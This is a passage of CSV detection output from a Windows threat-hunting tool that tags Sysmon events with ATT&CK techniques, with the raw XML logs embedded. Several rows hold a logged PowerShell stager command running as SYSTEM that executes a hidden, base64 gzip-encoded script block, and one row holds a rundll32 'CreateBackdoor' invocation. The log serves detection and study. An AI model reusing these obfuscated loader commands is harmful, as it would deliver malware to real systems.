gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-2586-5CC9-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-AF8B-5CC8-0000-0010AC1B1900</Data>
<Data Name=""ParentProcessId"">3872</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1594332367.487274,2020-07-10T02:06:07.487274+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-07-09T22:05:58.373961Z"">
</TimeCreated>
<EventRecordID>311382</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3148"" ThreadID=""4088"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-07-09 22:05:55.880</Data>
<Data Name=""ProcessGuid"">747F3D96-94C3-5F07-0000-001080B40100</Data>
<Data Name=""ProcessId"">3096</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-1350-5F08-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">628</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1115] Clipboard Data Collection,1594376435.589722,2020-07-10T14:20:35.589722+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rdpclip.exe ) through command line ( rdpclip ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-07-10T10:20:34.910334Z"">
</TimeCreated>
<EventRecordID>311396</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3148"" ThreadID=""4088"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-07-10 10:20:34.877</Data>
<Data Name=""ProcessGuid"">747F3D96-40F2-5F08-0000-0010D8A92C00</Data>
<Data Name=""ProcessId"">3304</Data>
<Data Name=""Image"">C:\Windows\System32\rdpclip.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1131 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">RDP Clipboard Monitor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">rdpclip.exe</Data>
<Data Name=""CommandLine"">rdpclip</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-94CD-5F07-0000-0020ABBF0300</Data>
<Data Name=""LogonId"">0x3bfab</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=0265C1718EC95B025D9719F3B4872826F8F4661F,MD5=9E089ECF8B86983B7A77E3844CD02BB5,SHA256=AF5CAE4B514215E530643A7FEA2D7A47A1B15F6E5610347B217D1ABFA4AE0F92,IMPHASH=E3F33CEBF67721DAC951AFBD20321206</Data>
<Data Name=""ParentProcessGuid"">747F3D96-1350-5F08-0000-001014C50000</Data>
<Data Name=""ParentProcessId"">824</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\System32\svchost.exe -k NetworkService -s TermService</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.459240Z"">
</TimeCreated>
<EventRecordID>243558</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.452</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001035972000</Data>
<Data Name=""ProcessId"">1388</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028568.168278,2019-03-20T00:49:28.168278+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:49:28.158264Z"">
</TimeCreated>
<EventRecordID>1966403</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:49:28.058</Data>
<Data Name=""ProcessGuid"">365ABB72-55D8-5C91-0000-001060C90700</Data>
<Data Name=""ProcessId"">3648</Data>
<Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
<Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Compatibility Database Installer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q -u &quot;C:\Windows\AppPatch\Test.SDB &quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
<Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
<Data Name=""ParentProcessId"">2704</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1556656012.371714,2019-05-01T00:26:52.371714+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;powershell.exe&quot; -noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:26:52.356089Z"">
</TimeCreated>
<EventRecordID>9809</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:26:52.356</Data>
<Data Name=""ProcessGuid"">365ABB72-AF8C-5CC8-0000-001003361900</Data>
<Data Name=""ProcessId"">2484</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;powershell.exe&quot; -noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-2586-5CC9-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-AF8B-5CC8-0000-0010AC1B1900</Data>
<Data Name=""ParentProcessId"">3872</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PG